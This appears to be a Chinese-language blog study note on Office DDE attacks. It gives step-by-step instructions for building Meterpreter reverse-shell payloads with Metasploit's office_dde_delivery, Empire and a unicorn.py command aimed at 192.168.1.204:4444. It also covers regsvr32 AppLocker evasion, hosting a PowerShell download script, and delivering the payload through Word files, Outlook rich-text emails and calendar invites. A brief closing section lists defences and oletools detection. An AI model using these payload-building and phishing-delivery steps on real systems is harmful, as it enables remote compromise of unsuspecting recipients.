DDE有效负载
nicorn 是一个简单的工具,用于使用 PowerShell 降级攻击并将 shellcode 直接注入内存
动态交换数据的DDE协议,DDE 协议是一组消息和指南。它在共享数据的应用程序之间发送消息并使用共享内存在应用程序之间交换数据,应用程序可以使用 DDE 协议进行一次性数据传输和连续交换,其中应用程序在新数据可用时相互发送更新。
DDE(动态数据交换)是一种半遗留的 Windows 功能,用于在当前文档中显示来自外部数据源的数据。
这个功能的问题在于它不仅允许您调用外部文档,还允许您调用进程,并且您也可以提供命令行参数
msf
一旦执行进行动态数据交互的,自己删了也没用
利用office_dde_delivery
然后更改有效负载窗口为 windows/meterpreter/reverse_tcp
设置端扣
然后生成的rtf文件更改成word文件
DDE 负载将通过利用regsvr32方法来执行以逃避 AppLocker 限制,并且向目标用户显示的对话框将不包含任何警报消息。
帝国
empire
安装
./setup/install.sh
然后直接运行
这个不能用,我操,缺少flask,但kali已经安装了,丢了丢了
办公的dde
pip install -r requirements.txt
可以结合msf的dde使用
python3支持的
生成的office_dde_delivery可以使用查看来确定文本的exe的具体位置。具体的网站也知道
攻击方式有两中,第一种是把office生成的直接发送给目标,使用meterpreter来监听,
另一种是在web服务器上托管文件并使用frameset 在另一个Word 上创建引用包含 DDE 的文档。框架集将被注入到 webSettings.xml 文件中
额,不太会怎样使用meterpreter监听,。。。

独角兽unicorn
将dde攻击导入独角兽,是一种可以使用powershell降级攻击shellcode注入内存的工具。
python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.204 4444 dde
生成三个文件
powershell_attack.txt dde有效负载
unicorn.rc 监听器配置
dowaload.ps1 外壳代码
运行监听
msfconsole -r unicorn.rc
download.ps1 PowerShell脚本需要一台服务器上托管因此文档被打开时,它会尝试执行的有效载荷。出现在用户面前的 Word 对话框将通知他无法访问加载项,并启动 Word 而是使对话框更加复杂。
防御
禁止自动更新连接
使用 Windows 10 Fall Creators 更新中引入了 Windows Defender Exploit Guard
防止 Word/Excel/Powerpoint 产生子进程。这不仅应该阻止这种攻击,还应该阻止 DDE 和嵌入式 OLE 等
oletools
是一种提取dde中的文件,来进行查看是否含有dde,当然可能会过滤
使用方法
先安装环境
pip install -r requirements.txt
定位到oletools
然后
python3 msodde.py 文件绝对路径
从而提取
插入方法
ctrl+f9
然后插入恶意代码
我靠,有失误现象发生...
还是老老实实用模块吧
...
另一种是outlook
您还可以使用 Outlook Rich Text 电子邮件消息触发此操作,Outlook 2013/2016 的唯一警告是您需要先将图像/图表/对象嵌入其中,然后再添加 DDEAUTO 有效负载。
打开新的 Word 文档,按 CTRL+F9 键,然后将您的负载粘贴到 {} 括号之间,然后打开一封新的 Outlook 电子邮件。转到格式文本选项卡并将消息更改为富文本格式。 在邮件正文中,将任何图像复制并粘贴到正文中。

从您的 Word 文档中复制您的 DDEAuto 有效负载,然后将其粘贴到电子邮件正文中。输入收件人等并发送。您将收到 DDE 消息,只需对它们说不。当您的收件人收到电子邮件时,它不会触发,直到他们按下回复。如果他们对前 2 个消息框按是,那么它将执行您的有效负载。


日历邀请:
另一个攻击媒介是重复的日历邀请。每次目标打开它时,它们都会重新拥有。



浙公网安备 33010602011771号